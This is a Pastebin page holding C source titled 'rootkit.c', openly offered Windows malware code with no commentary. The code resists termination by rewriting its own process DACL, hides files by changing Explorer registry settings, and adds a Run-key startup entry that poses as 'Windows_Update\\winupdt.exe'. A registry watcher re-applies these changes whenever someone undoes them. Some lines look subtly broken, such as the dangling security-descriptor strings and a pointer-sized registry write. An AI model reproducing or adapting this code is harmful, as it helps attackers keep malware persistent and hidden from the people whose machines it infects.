Advertisement
FlyFar

rootkit.c

Jul 15th, 2023
950
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.74 KB | Cybersecurity | 0 0
  1. #include <windows.h>
  2. #include <aclapi.h>
  3. #include <sddl.h>
  4. #include <tchar.h>
  5.  
  6. _Bool SelfDefense()
  7. {
  8.     HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId());
  9.     SECURITY_ATTRIBUTES sa;
  10.     TCHAR * szSD = TEXT("D:P");
  11.     TEXT("(D;OICI;GA;;;BG)");
  12.     TEXT("(D;OICI;GA;;;AN)");
  13.  
  14.     sa.nLength = sizeof(SECURITY_ATTRIBUTES);
  15.     sa.bInheritHandle = FALSE;
  16.     if (!ConvertStringSecurityDescriptorToSecurityDescriptor(szSD, SDDL_REVISION_1, &(sa.lpSecurityDescriptor), NULL))
  17.         return FALSE;
  18.     if (!SetKernelObjectSecurity(hProcess, DACL_SECURITY_INFORMATION, sa.lpSecurityDescriptor))
  19.         return FALSE;
  20.     return TRUE;
  21. }
  22.  
  23. void hideFiles() {
  24.     HKEY newValue;
  25.    
  26.     RegOpenKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", &newValue);
  27.     int n = 2;
  28.     char* a = (char*)&n;
  29.     RegSetValueEx(newValue, "Hidden", 0, REG_DWORD, a, sizeof(a));
  30.     RegCloseKey(newValue);
  31.  
  32.     RegOpenKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", &newValue);
  33.     n = 0;
  34.     a = (char*)&n;
  35.     RegSetValueEx(newValue, "ShowSuperHidden", 0, REG_DWORD, a, sizeof(a));
  36.     RegCloseKey(newValue);
  37. }
  38.  
  39. void fixStartup() {
  40.     system("REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Windows_Update /t REG_SZ /F /D %APPDATA%\\Windows_Update\\winupdt.exe");
  41. }
  42.  
  43. void WatchReg(char *watch, _Bool watchType)
  44. {
  45.     DWORD  dwFilter =   REG_NOTIFY_CHANGE_NAME          |
  46.                         REG_NOTIFY_CHANGE_ATTRIBUTES    |
  47.                         REG_NOTIFY_CHANGE_LAST_SET      |
  48.                         REG_NOTIFY_CHANGE_SECURITY;
  49.  
  50.     HANDLE hEvent;
  51.     HKEY   hMainKey;
  52.     HKEY   hKey;
  53.     LONG   lErrorCode;
  54.  
  55.     hMainKey = HKEY_CURRENT_USER;
  56.  
  57.     lErrorCode = RegOpenKeyEx(hMainKey, watch, 0, KEY_NOTIFY, &hKey);
  58.     if (lErrorCode != ERROR_SUCCESS)
  59.     {
  60.         _tprintf(TEXT("Error in RegOpenKeyEx (%d).\n"), lErrorCode);
  61.         return;
  62.     }
  63.  
  64.     hEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
  65.     if (hEvent == NULL)
  66.     {
  67.         _tprintf(TEXT("Error in CreateEvent (%d).\n"), GetLastError());
  68.         return;
  69.     }
  70.  
  71.     lErrorCode = RegNotifyChangeKeyValue(hKey, TRUE, dwFilter, hEvent, TRUE);
  72.     if (lErrorCode != ERROR_SUCCESS)
  73.     {
  74.         _tprintf(TEXT("Error in RegNotifyChangeKeyValue (%d).\n"), lErrorCode);
  75.         return;
  76.     }
  77.  
  78.     while(1 > 0) {
  79.         if (WaitForSingleObject(hEvent, INFINITE) == WAIT_FAILED)
  80.         {
  81.             _tprintf(TEXT("Error in WaitForSingleObject (%d).\n"), GetLastError());
  82.             return;
  83.         }
  84.         else
  85.         {
  86.             if (watchType)
  87.                 hideFiles();
  88.             else
  89.                 fixStartup();
  90.  
  91.             WatchReg(watch, watchType);
  92.         }
  93.     }
  94.  
  95.     lErrorCode = RegCloseKey(hKey);
  96.     if (lErrorCode != ERROR_SUCCESS)
  97.     {
  98.         _tprintf(TEXT("Error in RegCloseKey (%d).\n"), GetLastError());
  99.         return;
  100.     }
  101.  
  102.     if (!CloseHandle(hEvent))
  103.     {
  104.         _tprintf(TEXT("Error in CloseHandle.\n"));
  105.         return;
  106.     }
  107. }
Tags: go
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement